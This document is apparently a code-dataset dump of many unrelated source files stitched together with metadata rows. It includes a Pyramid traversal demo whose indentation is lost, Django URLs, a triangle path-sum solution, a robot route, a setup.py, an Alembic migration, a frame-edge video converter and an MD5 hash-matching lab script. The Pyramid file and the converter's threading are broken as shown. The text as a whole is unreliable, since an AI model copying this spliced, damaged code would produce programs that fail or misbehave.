class Folder(OrderedDict):
def __init__(self, name, parent, title):
super(Folder, self).__init__()
self.__name__ = name
self.__parent__ = parent
self.title = title
class Document(object):
def __init__(self, name, parent, title, body):
self.__name__ = name
self.__parent__ = parent
self.title = title
self.body = body
class SiteFolder(Folder):
pass
class Collector(Folder):
def __init__(self, *args, **kwds):
super(Collector, self).__init__(*args, **kwds)
self.toysList = []
class Toy(object):
__slots__ = ('__name__', '__parent__',
'title', 'description', 'tag')
def __init__(self, data, parent):
self.__name__ = data['title']
self.__parent__ = parent
self.title = data['title']
self.description = data['description']
self.tag = data['tag']
class SimpleDB(OrderedDict):
def __init__(self, name, parent, title):
super(SimpleDB, self).__init__()
self.__name__ = name
self.__parent__ = parent
self.title = title
def __getitem__(self, key):
print 'need key = %s' % key
try:
item = super(SimpleDB, self).__getitem__(key)
except KeyError:
print 'Key %s error!' % (key,)
print 'Generating new Bear toy with key %s' % (key,)
newtoy = {'title': u'Generated Bear %s' % (key,),
'description': u'Generated description for Bear %s' % (key,),
'tag': u'bears'}
item = Toy(data = newtoy,
parent = switchcollector[newtoy['tag']])
# save generated toy
self[key] = item
# update collector for Bears
collector1.toysList.insert(0, key)
return item
def __setitem__(self, key, value):
print 'saving %s to key %s' % (value, key)
super(SimpleDB, self).__setitem__(key, value)
def get_root(request):
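    # Pyramid traversal root factory: the returned resource tree's
    # __name__/__parent__ links drive URL traversal and view lookup.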
return RTREE
def view_site(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Site folder</title>
</head>
<body>
<h3>title: $title</h3>
<p>Leaves: $keys</p>
</body>
</html>
""")
output = s.safe_substitute(title = context.title,
keys = getFolderLeaves(request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_folder(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Folder $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
<p>Leaves: $keys</p>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
keys = getFolderLeaves(request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_collector(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Collector $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
<h3>Toys:</h3>
$toys
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
toys = getToysTableLinks(context, request))
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_doc(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Document $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<p>body: $body</p>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
body = context.body)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_db(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Database $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>title: $title</h3>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def view_toy(context, request):
s = Template("""
<!DOCTYPE html>
<html>
<head>
<title>Toy $name</title>
</head>
<body>
<p>BC: $breadcrumbs</p>
<hr>
<h3>Title: $title</h3>
<h3>Tag: $tag</h3>
<h3>Description:</h3>
<p>$descr</p>
<hr>
</body>
</html>
""")
output = s.safe_substitute(breadcrumbs = getBreadCrumbs(request),
name = context.__name__,
title = context.title,
descr = context.description,
tag = context.tag)
return Response(body=output,
charset='utf-8',
content_type='text/html',
content_language='ru')
def getBreadCrumbs(request):
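    # pyramid.location.lineage walks __parent__ links from the context up
    # to the root, so the reversed list runs root -> context.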
cr = [(request.resource_url(i), i.title) for i in lineage(request.context)]
cr.reverse()
li = ['<li>' + '<a href="' + i[0] + '">' + i[1] + '</a></li>'
for i in cr[:-1]]
#last item of breadcrumbs
li.append('<li>' + cr[-1][1] + '</li>')
return "<ul>" + "\n".join(li) + "</ul>"
def getFolderLeaves(request):
leaves = request.context.items()
li = ['<li>' + '<a href="' + request.resource_url(i[1]) + '">' + i[0] +
'</a></li>' for i in leaves]
return "<ul>" + "\n".join(li) + "</ul>"
def getToysList(collector):
if collector.toysList:
return collector.toysList
else:
return []
def getToysTable(collector):
table = u"""
<table>
<tbody>
<tr>
"""
lst = [table]
if collector.toysList:
for i in collector.toysList:
lst.append(u"<td>%s</td>" % i)
lst.append(u"</tr></tbody></table>")
return "".join(lst)
else:
return ""
def getToysTableLinks(collector, request):
table = u"""
<table>
<tbody>
<tr>
"""
lst = [table]
if collector.toysList:
for i in collector.toysList:
lst.append(u"<td><a href=\"/db/%s\">%s</a></td>" % (i, i))
lst.append(u"</tr></tbody></table>")
return "".join(lst)
else:
return ""
def fillCollector(collector, tag, db):
lst = []
data = db.items()
for (k, v) in data:
if v['tag'] == tag:
lst.append(k)
collector.toysList.extend(lst)
def printinfo(context, request):
# print request.__dict__
    formatstring = '%-36s%s'
print formatstring % ('request.url', request.url)
print formatstring % ('request.host', request.host)
print formatstring % ('request.host_url', request.host_url)
print formatstring % ('request.application_url', request.application_url)
print formatstring % ('request.path_url', request.path_url)
print formatstring % ('request.path', request.path)
print formatstring % ('request.path_qs', request.path_qs)
print formatstring % ('request.query_string', request.query_string)
print 10 * '-'
# print formatstring % ('request.matchdict', request.matchdict)
### need a name attribute
# print formatstring % ('request.resource_url(context)', request.resource_url(context))
print formatstring % ('request.cookies', request.cookies)
print formatstring % ('request.headers', request.headers)
# print formatstring % ('request.json', request.json)
print formatstring % ('request.method', request.method)
print formatstring % ('request.charset', request.charset)
if request.params:
print formatstring % ('request.params', request.params)
print formatstring % ('request.params.keys()', request.params.keys())
print formatstring % ('request.params.items()', request.params.items())
    # error if several 'age' parameters are passed at once
# print formatstring % ('request.params.getone(\'age\')', request.params.getone('age'))
print formatstring % ('request.params.getall(\'age\')', request.params.getall('age'))
print 60 * '='
print 'context info'
print
for i in context:
print i, context[i]
print 60 * '='
print 'URL parameters'
################
# resources tree
#
RTREE = SiteFolder('', None, u'Site folder')
folder1 = Folder(u'f1', RTREE, u'Folder one')
RTREE[u'f1'] = folder1
folder2 = RTREE[u'f2'] = Folder(u'f2', RTREE, u'Folder two')
folder3 = RTREE[u'f3'] = Folder(u'f3', RTREE, u'Folder три')
folder4 = folder3[u'f4'] = Folder(u'f4', folder3, u'Folder #4')
d1 = Document(name=u'd1',
parent=folder1,
title=u'Testing document 1',
body=u'Body of testing document 1')
folder1[u'd1'] = d1
# main toys collector
collector = RTREE[u'toys'] = Folder(u'toys', RTREE, u'Toys')
collector1 = collector[u'bears'] = Collector(u'bears', collector, u'Bears')
collector2 = collector[u'dolls'] = Collector(u'dolls', collector, u'Dolls')
collector3 = collector[u'angels'] = Collector(u'angels', collector, u'Angels')
collector4 = collector[u'test'] = Collector(u'test', collector, u'Testing')
simpledb = RTREE[u'db'] = SimpleDB(u'db', RTREE, u'SimpleDB')
PSEUDO_DB = {
1: {'title': u'Bear 1', 'description': u'Description of Bear 1', 'tag': u'bears'},
2: {'title': u'Doll 2', 'description': u'Description of Doll 2', 'tag': u'dolls'},
3: {'title': u'Doll 3', 'description': u'Description of Doll 3', 'tag': u'dolls'},
4: {'title': u'Bear 4', 'description': u'Description of Bear 4', 'tag': u'bears'},
5: {'title': u'Doll 5', 'description': u'Description of Doll 5', 'tag': u'dolls'},
6: {'title': u'Angel 6', 'description': u'Description of Angel 6', 'tag': u'angels'},
7: {'title': u'Doll 7', 'description': u'Description of Doll 7', 'tag': u'dolls'},
8: {'title': u'Doll 8', 'description': u'Description of Doll 8', 'tag': u'dolls'},
9: {'title': u'Bear 9', 'description': u'Description of Bear 9', 'tag': u'bears'},
10: {'title': u'Angel 10', 'description': u'Description of Angel 10', 'tag': u'angels'},
11: {'title': u'Angel 11', 'description': u'Description of Angel 11', 'tag': u'angels'},
12: {'title': u'Angel 12', 'description': u'Description of Angel 12', 'tag': u'angels'},
13: {'title': u'Angel 13', 'description': u'Description of Angel 13', 'tag': u'angels'},
14: {'title': u'Bear 14', 'description': u'Description of Bear 14', 'tag': u'bears'},
15: {'title': u'Bear 15', 'description': u'Description of Bear 15', 'tag': u'bears'},
16: {'title': u'Angel 16', 'description': u'Description of Angel 16', 'tag': u'angels'},
17: {'title': u'Test 17', 'description': u'Description of Test 17', 'tag': u'test'},
18: {'title': u'Test 18', 'description': u'Description of Test 18', 'tag': u'test'},
19: {'title': u'Doll 19', 'description': u'Description of Doll 19', 'tag': u'dolls'},
20: {'title': u'Test 20', 'description': u'Description of Test 20', 'tag': u'test'},
21: {'title': u'Angel 21', 'description': u'Description of Angel 21', 'tag': u'angels'},
22: {'title': u'Bear 22', 'description': u'Description of Bear 22', 'tag': u'bears'},
23: {'title': u'Test 23', 'description': u'Description of Test 23', 'tag': u'test'},
24: {'title': u'Doll 24', 'description': u'Description of Doll 24', 'tag': u'dolls'},
25: {'title': u'Doll 25', 'description': u'Description of Doll 25', 'tag': u'dolls'},
26: {'title': u'Test 26', 'description': u'Description of Test 26', 'tag': u'test'},
27: {'title': u'Bear 27', 'description': u'Description of Bear 27', 'tag': u'bears'},
28: {'title': u'Test 28', 'description': u'Description of Test 28', 'tag': u'test'},
29: {'title': u'Angel 29', 'description': u'Description of Angel 29', 'tag': u'angels'},
30: {'title': u'Test 30', 'description': u'Description of Test 30', 'tag': u'test'},
31: {'title': u'Doll 31', 'description': u'Description of Doll 31', 'tag': u'dolls'},
}
###########################################################################
if __name__ == '__main__':
config = Configurator(root_factory=get_root)
config.add_view(view=view_site,
context=SiteFolder)
config.add_view(view=view_folder,
context=Folder)
config.add_view(view=view_collector,
context=Collector)
config.add_view(view=view_doc,
context=Document)
config.add_view(view=view_db,
context=SimpleDB)
config.add_view(view=view_toy,
context=Toy)
# filling collectors of toys
fillCollector(collector1, u'bears', PSEUDO_DB)
fillCollector(collector2, u'dolls', PSEUDO_DB)
fillCollector(collector3, u'angels', PSEUDO_DB)
fillCollector(collector4, u'test', PSEUDO_DB)
########################################
# initialize database
switchcollector = {u'bears': collector1,
u'dolls': collector2,
u'angels': collector3,
u'test': collector4}
for (k, v) in PSEUDO_DB.items():
simpledb[str(k)] = Toy(data = v,
parent = switchcollector[v['tag']])
app = config.make_wsgi_app()
server = make_server('0.0.0.0', 8080, app)
server.serve_forever()
| [
"[email protected]"
]
| |
218c3c740337ecd6f019cf07d45326d26a037866 | 2437f5e7f243ccf712f94b08f272b7d5387f90cf | /dailyfresh/apps/cart/urls.py | a7e68618919bfccd6fe10436169f4b05ec0e1449 | []
| no_license | KWTsoftkitty/pyCode | b06b128292a2c64e5552c495087693bdd01042c4 | fffa66737ca9ba29b296245767eea8af3ee769d6 | refs/heads/master | 2020-03-25T20:46:45.163930 | 2019-08-30T08:40:27 | 2019-08-30T08:40:27 | 144,145,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 455 | py | from django.conf.urls import url
from cart.views import CartInfoView, CartAddView, CartUpdateView, CartDeleteView
urlpatterns = [
url(r'^show$', CartInfoView.as_view(), name='show'), # 购物车页面显示
url(r'^add$', CartAddView.as_view(), name='add'), # 购物车添加
url(r'^update$', CartUpdateView.as_view(), name='update'), # 购物车更新
url(r'^delete$', CartDeleteView.as_view(), name='delete'), # 删除购物车记录
]
| [
"[email protected]"
]
| |
c6eafbbe4676917c6f23a05bc73e21e549c0ba3f | 43842089122512e6b303ebd05fc00bb98066a5b2 | /dynamic_programming/120_triangle.py | 99985fab0c45baef506be9737699a9531b32e925 | []
| no_license | mistrydarshan99/Leetcode-3 | a40e14e62dd400ddb6fa824667533b5ee44d5f45 | bf98c8fa31043a45b3d21cfe78d4e08f9cac9de6 | refs/heads/master | 2022-04-16T11:26:56.028084 | 2020-02-28T23:04:06 | 2020-02-28T23:04:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,507 | py | """
Given a triangle, find the minimum path sum from top to bottom. Each step you may move to adjacent numbers on the row below.
For example, given the following triangle
[
[2],
[3,4],
[6,5,7],
[4,1,8,3]
]
The minimum path sum from top to bottom is 11 (i.e., 2 + 3 + 5 + 1 = 11).
"""
class Solution(object):
def minimumTotal_1(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
result = []
for line in range(1, len(triangle)):
result.append([0] * line)
result.append(triangle[-1])
for i in reversed(range(len(triangle))):
for j in range(i):
result[i - 1][j] = min(result[i][j], result[i][j+1]) + triangle[i - 1][j]
return result[0][0]
def minimumTotal_2(self, triangle):
# modify the triangle in place
if not triangle:
return
for i in range(len(triangle)-2, -1, -1):
for j in range(len(triangle[i])):
triangle[i][j] = min(triangle[i+1][j], triangle[i+1][j+1]) + triangle[i][j]
return triangle[0][0]
def minimumTotal_3(self, triangle):
# O(n) space
if not triangle:
return
result = triangle[-1]
for i in range(len(triangle) - 2, -1, -1):
for j in range(len(triangle[i])):
result[j] = min(result[j], result[j+1]) + triangle[i][j]
return result[0]
triangle_1 = [[2],[3,4],[6,5,7],[4,1,8,3]]
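
# Quick check (illustrative addition, not part of the original file);
# both variants should report the minimum path sum 11 for triangle_1.
if __name__ == '__main__':
    sol = Solution()
    print(sol.minimumTotal_1([row[:] for row in triangle_1]))  # expected 11
    print(sol.minimumTotal_3([row[:] for row in triangle_1]))  # expected 11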
| [
"[email protected]"
]
| |
c58de3d099facdaa74fbc9362cf2b4d91bbdac3f | 297c6d7f0c15538349e2854c93a9b672836f433a | /routes/route4.py | 9db70781388939fe05282160420b8e727089cc97 | []
| no_license | Utklossning/ev3-robot | 5dec26e72b870589909acfe4a23862930b4a3112 | 1830c19e3406521f3384256137ec7c6e969ed3c0 | refs/heads/master | 2020-04-05T09:47:25.332861 | 2018-11-19T07:37:14 | 2018-11-19T07:37:14 | 156,774,626 | 0 | 0 | null | 2018-11-17T09:10:17 | 2018-11-08T22:01:21 | Python | UTF-8 | Python | false | false | 664 | py | import time
class Route():
def __init__(self, bot):
self.bot = bot
self.route_number = "four"
def start(self):
self.bot.move_forward(45, 50)
self.bot.rotate_right(45, 50)
self.bot.move_forward(44, 50)
self.bot.rotate_right(46, 50)
self.bot.move_forward(28, 50)
self.bot.detect_red_tape()
self.bot.empty_container()
self.bot.move_backward(35, 75)
self.bot.rotate_left(46, 50)
self.bot.move_backward(44, 75)
self.bot.rotate_left(37, 50)
self.bot.move_backward(57, 75)
return True
| [
"[email protected]"
]
| |
bf9f3b6aa1efcc20fe3d0f874b18a994c50a5c78 | 9c84d806af445c9998f3145f07efe5d30b91c815 | /users/migrations/0001_initial.py | f6e88219a642508d9b52bb956e3e985136460980 | []
| no_license | naman114/Django_Blog | c065e50b7e6184e69bc4e2ac19b36c98d6084aea | c97eb63fd4d67df4638ab5766ee76cd5e39023ea | refs/heads/master | 2023-04-18T03:15:47.368787 | 2021-05-04T00:36:02 | 2021-05-04T00:36:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 777 | py | # Generated by Django 3.1.7 on 2021-03-30 20:09
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default='default.jpg', upload_to='profile_pics')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
]
| |
38ed67962462a2b1c17e8f0180e3df363f2c1773 | fb3630fa338b304cd951b94375faf6c55a94488e | /msu_map/raw/images/convertPNG.py | bc9ca24e740c4e7995f1d2b56842e474db3cf325 | []
| no_license | Outtascope/MSUPaths_iPhone | 9001fccceccfed791a3d41846eb47424d847890e | 062f20860e949bea72872d912da046774ce6e0a8 | refs/heads/master | 2020-12-07T15:32:38.461826 | 2015-06-18T02:27:02 | 2015-06-18T02:27:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 224 | py | from PIL import Image
from glob import glob
for imgFile in glob("./*.png"):
try:
img = Image.open(imgFile)
img.save(imgFile,"PNG")
except IOError, msg:
print "Fail at: ", imgFile, " :", msg
| [
"[email protected]"
]
| |
ee0ea350d13c32438c662a8a258423d9b8287956 | 20c4a239e000b15131251d372ccad9110063a961 | /setup.py | 91ea45b7093ebde7a34cf7d5eb933f7529893fdf | [
"MIT"
]
| permissive | Partidani/hdlConvertor | 9d0e382e6e087ac240502538b63f8667004a7715 | 36d3b58e2641e39c323ed9ee337135e49c64d076 | refs/heads/master | 2023-04-06T00:03:31.505727 | 2021-04-19T07:28:25 | 2021-04-19T07:28:25 | 366,418,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,810 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
from setuptools import find_packages
try:
from skbuild import setup
except ImportError:
raise ImportError("Missing scikit-build, (should be automatically installed by pip)")
import sys
this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, "README.md")) as f:
long_description = f.read()
deps = ["typing", "future"] if sys.version_info[0] == 2 else []
setup(
cmake_args=[
# '-DCMAKE_BUILD_TYPE=Debug'
],
name='hdlConvertor',
version='2.2',
description='VHDL and System Verilog parser written in c++',
long_description=long_description,
long_description_content_type="text/markdown",
url='https://github.com/Nic30/hdlConvertor',
author='Michal Orsak',
author_email='[email protected]',
keywords=['hdl', 'vhdl', 'verilog', 'system verilog',
'parser', 'preprocessor', 'antlr4'],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Operating System :: OS Independent',
'Topic :: Software Development :: Build Tools',
'Programming Language :: C++',
'Programming Language :: Cython',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',
],
install_requires=[
'hdlConvertorAst>=0.7',
] + deps,
license="MIT",
packages=find_packages(exclude=["tests", ]),
test_suite="tests.main_test_suite",
test_runner="tests:TimeLoggingTestRunner",
tests_require=deps,
)
| [
"[email protected]"
]
| |
9b0e3331a7b373bdb5062de6b475a67be0194b67 | aca7781f4341a2d9e2c4e9aa663efe1fbfc20b26 | /migration/versions/617d6d1ed309_first.py | b37fe959fe46a7aba66867c3cfa0854280477307 | []
| no_license | rhezaas/hcl-user-service | 23944798939f85b875b8c65fd9a2ce0d33436485 | 3a841e52d4a593a4d2873a19152935f0680cda79 | refs/heads/master | 2023-08-16T23:31:34.994984 | 2021-03-01T16:20:24 | 2021-03-01T16:20:24 | 330,072,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,538 | py | """first
Revision ID: 617d6d1ed309
Revises:
Create Date: 2021-01-09 19:36:33.085083
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '617d6d1ed309'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.execute('CREATE SCHEMA IF NOT EXISTS "user"')
op.create_table(
'user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('firstname', sa.String(length=100), nullable=False),
sa.Column('lastname', sa.String(length=100), nullable=False),
sa.Column('profile', sa.Text(), nullable=True),
sa.Column('phone', sa.String(length=50), nullable=False),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id'),
schema='user'
)
op.create_table(
'account',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('username', sa.String(length=100), nullable=False),
sa.Column('password', sa.String(length=100), nullable=False),
sa.Column('token', sa.String(length=100), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('user_id'),
schema='user'
)
op.create_table(
'image',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('created_at', sa.DateTime(), nullable=True),
sa.Column('updated_at', sa.DateTime(), nullable=True),
sa.Column('image', sa.Text(), nullable=False),
sa.Column('width', sa.Integer(), nullable=True),
sa.Column('height', sa.Integer(), nullable=True),
sa.Column('deleted_at', sa.DateTime(), nullable=True),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['user_id'], ['user.user.id'], ),
sa.PrimaryKeyConstraint('id'),
schema='user'
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('image', schema='user')
op.drop_table('account', schema='user')
op.drop_table('user', schema='user')
# ### end Alembic commands ###
| [
"[email protected]"
]
| |
d15e9de176089c15a1ec2cf8cb55e7e06d17da4a | 06b6b2e090724557683e582641acecd3a0eecb59 | /src/calcularfactura.py | 2ee919ca1e1efe9919f7d9d11d9b18a4b891145b | []
| no_license | mmorac/factura | d0f6f8b0c50f74a9c695088d3366ed588c53f2e1 | 9c405575d072d262bdf4db01881701591cbd67d6 | refs/heads/master | 2022-04-25T18:34:49.474668 | 2020-04-24T08:23:43 | 2020-04-24T08:23:43 | 258,345,468 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,533 | py | import pandas as pd
import obtenerhoras
from datetime import datetime
def calcularfactura(fecha_inicio, fecha_fin):
tabla = obtenerhoras.obtenerhoras("../archivos/factura.xlsx")
if("-" in fecha_inicio):
now = datetime.now()
fecha_inicio = fecha_inicio.split("-")
fecha_fin = fecha_fin.split("-")
if(int(fecha_inicio[1]) > now.month + 1):
f_inicio = str(now.year - 1) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
else:
f_inicio = str(now.year) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
f_fin = str(now.year) + "-" + fecha_fin[1] + "-" + fecha_fin[0]
elif("/" in fecha_inicio):
now = datetime.now()
fecha_inicio = fecha_inicio.split("/")
fecha_fin = fecha_fin.split("/")
f_inicio = str(now.year) + "-" + fecha_inicio[1] + "-" + fecha_inicio[0]
f_fin = str(now.year) + "-" + fecha_fin[1] + "-" + fecha_fin[0]
agregar = False
sumar = []
for i in range(len(tabla.columns)):
if(tabla.columns[i] == f_inicio):
agregar = True
elif(tabla.columns[i-1] == f_fin):
agregar = False
if(agregar):
sumar.append(tabla.columns[i])
tabla["Total Hours"] = tabla[sumar].sum(axis=1)
tabla["Total"] = tabla["Total Hours"] * tabla["Rate"]
sumar.insert(0, "Rate")
sumar.insert(0, "Resource Name")
sumar.insert(len(sumar), "Total Hours")
sumar.insert(len(sumar), "Total")
resultado = tabla[sumar]
return resultado
| [
"[email protected]"
]
| |
3273285dc5118a47952c40dfdd26e29bd612aa47 | 46f03a8353b3fd0cd1ca35e0d322c4a53649596b | /try.py | 193887977e7feaeaa8f466637561399d7a348948 | []
| no_license | dragikamov/Video_Converter | d7d73a948853c99840606b89fc79dbcf8e1bde97 | e0233f9c190618e30bb85bcfa9df881f0eee058e | refs/heads/master | 2020-04-30T15:50:35.037923 | 2019-03-30T22:35:29 | 2019-03-30T22:35:29 | 176,931,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,925 | py | import cv2
import numpy as np
import os
from canny_edge import *
import threading
from os.path import isfile, join
# Function for converting an image to grayscale
def rgb2gray(rgb):
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
# Export of video
def exportVid():
frame_array = []
files = [f for f in os.listdir('data/') if isfile(join('data/', f))]
files.sort(key = lambda x: int(x[5:-4]))
for i in range(len(files)):
filename = 'data/' + files[i]
img = cv2.imread(filename)
height, width, _ = img.shape
size = (width,height)
print(filename)
frame_array.append(img)
fourcc = cv2.VideoWriter_fourcc(*'DIVX')
out = cv2.VideoWriter('export.avi', fourcc, 24.0, (width,height))
for i in range(len(frame_array)):
out.write(frame_array[i])
out.release()
def thread(i, imgs):
    # Spawn one detect() worker per frame in the 60-frame buffer, start them
    # all in parallel, then wait for every worker to finish before returning.
    threads = [threading.Thread(target=detect, args=(imgs[j], i + j + 1)) for j in range(60)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
# Loading the video into python
cap = cv2.VideoCapture('bunny.mp4')
# Making a folder for the edited frames
try:
if not os.path.exists('data'):
os.makedirs('data')
except OSError:
print ('Error: Creating directory of data')
currentFrame = 0
imgs = []
height = 0
width = 0
n = 0
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
if not ret:
if(len(imgs) != 0):
for i in range(len(imgs)):
                detect(imgs[i], currentFrame - len(imgs) + i + 1)
break
# Converting the frame to grayscale and adding it to a list
name = './data/frame' + str(currentFrame) + '.jpg'
print ('Slicing and converting to grayscale...' + name)
imgs.append(rgb2gray(frame))
if(currentFrame % 60 == 0 and currentFrame != 0):
        thread(currentFrame - 60, imgs)  # this batch is numbered currentFrame-59 .. currentFrame
imgs = []
# Find height and width
height, width, _ = frame.shape
currentFrame += 1
image_folder = 'data'
images = [img for img in os.listdir(image_folder) if img.endswith(".jpg")]
frame = cv2.imread(os.path.join(image_folder, images[0]))
height, width, _ = frame.shape
exportVid()
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows() | [
"[email protected]"
]
| |
8489d3ddbd733e3678c75d8fcdde182f1b735194 | 60fd4409e031a18bbd65e37d2f7d4d05dcb65caa | /Python/代码实现/day02-多线程进程/13-多线程共享全局变量.py | f28f64bf29e1650b3a00ab9cb41fda8ebe34f421 | []
| no_license | YaoFANGUK/Practice-Code | 1e05310773f9d19f54c2d0197cd613c75defc38c | 01ee0c3f24d505c4fab5b82c52b545933871b950 | refs/heads/master | 2021-06-19T17:02:16.814441 | 2021-06-04T03:38:39 | 2021-06-04T03:38:39 | 222,544,962 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | # join: the main thread waits for add_thread to finish before continuing on
# conclusion: threads can share global variables
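# A minimal sketch of the two points above (the names add_thread and nums are
# illustrative assumptions, not part of the original lesson):
import threading

nums = []  # global variable shared by every thread in this process

def add_thread():
    for i in range(3):
        nums.append(i)  # each thread mutates the same global list

if __name__ == '__main__':
    t = threading.Thread(target=add_thread)
    t.start()
    t.join()  # the main thread blocks here until add_thread has finished
    print(nums)  # [0, 1, 2] -- the global state was shared with the worker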
| [
"[email protected]"
]
| |
0d98db9ec83456db136f54a759d5de5a9a1ccb42 | c42b08296e47e113ea66d8d14b383abccfbce409 | /myhashtry.py | 877c1cafe1784c183cfe3f85b83929bd081b06e3 | []
| no_license | unmutilated/code | 49750a92ec855158740f456b3b1d3dd34890ca88 | 8961e5cf394aecdf71d70cc6b2ff03f35de14db5 | refs/heads/master | 2022-05-24T13:14:37.318698 | 2020-04-27T20:11:08 | 2020-04-27T20:11:08 | 259,436,704 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,308 | py | import sys
import hashlib
Output = []
def ReadFile():
file0 = open("CRY_Lab_02_B_hashes.txt", "r")
    lines = file0.readlines()
file0.close()
s = set()
for data in lines:
s.add(data.strip())
print("Read in {0} lines from the MD5 hash file".format(len(lines)))
return s
def SaveFile():
file1 = open("Output.txt","w")
file1.writelines(Output)
    file1.close()
def HashFind():
hashset = ReadFile()
alph = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@"
count = 0
for element in range(0, len(alph)):
m = alph[element]
        print(element) # for debugging
print(len(alph)) #for debugging
h = hashlib.md5(m.encode()).hexdigest()
if h in hashset:
Output.append("{0} Found a hash: {1} hashes to {2}\n".format(count, m, h))
count = count +1
if count >= 1000:
print("All Done")
SaveFile()
sys.exit()
    # once the whole alphabet has been tried, save whatever was found
    SaveFile()
if __name__ == "__main__":
while True:
userchoice = input("to hash press h [Enter to quit]: ").upper()
if userchoice.startswith("H"):
HashFind()
else:
sys.exit()
| [
"[email protected]"
]
| |
53a4aee6671f14f354522c8971d2917b12424013 | acb5c517f02a6643e276b9c3ddf1a23bf15afc29 | /src/data/data_prep.py | a55851f23be96405cce7041f8149f90d14511382 | []
| no_license | razvannica/instrument-recognition | 13018ec6b403765dc452b9c961c9222967f041ee | a94866b67cc9646ed4633b761dd3440e14ec5f93 | refs/heads/master | 2020-03-20T07:06:47.404105 | 2018-06-13T22:02:58 | 2018-06-13T22:02:58 | 137,271,449 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,306 | py | import numpy as np
import os
import cPickle
import pandas as pd
import yaml
import wave
import struct
import gc
from scipy.io import wavfile
from scipy.io import savemat
import copy
import patch_label
"""
This file contains all scripts necessary for preparing data.
The code in this file reads all wav files, metadata and annotations for mixed
tracks. And then it takes patches of x seconds each from each track and labels
them.
Finally the resulting raw data is saved to several mat files, each containing
y tracks.
WARNING: If save_size is set to 20 in prep_data(), it takes 2 to 10 min to
read data for one mat file, 3GB memory to keep program running, and
1.5GB disk storage to save one mat file.
If you find yourself out of memory, set save_size to a lower value.
Still looking for more efficient ways to store data.
Need discussion: there are too many kinds of instruments (over 80) if we use all of them
"""
def backup_wavfile_reader(fpath):
"""Read wav files when scipy wavfile fail to read.
Args:
fpath (str): path to the wav file to read
Returns:
numpy array: data read from wav file
"""
f = wave.open(fpath, 'rb')
res = []
for i in xrange(f.getnframes()):
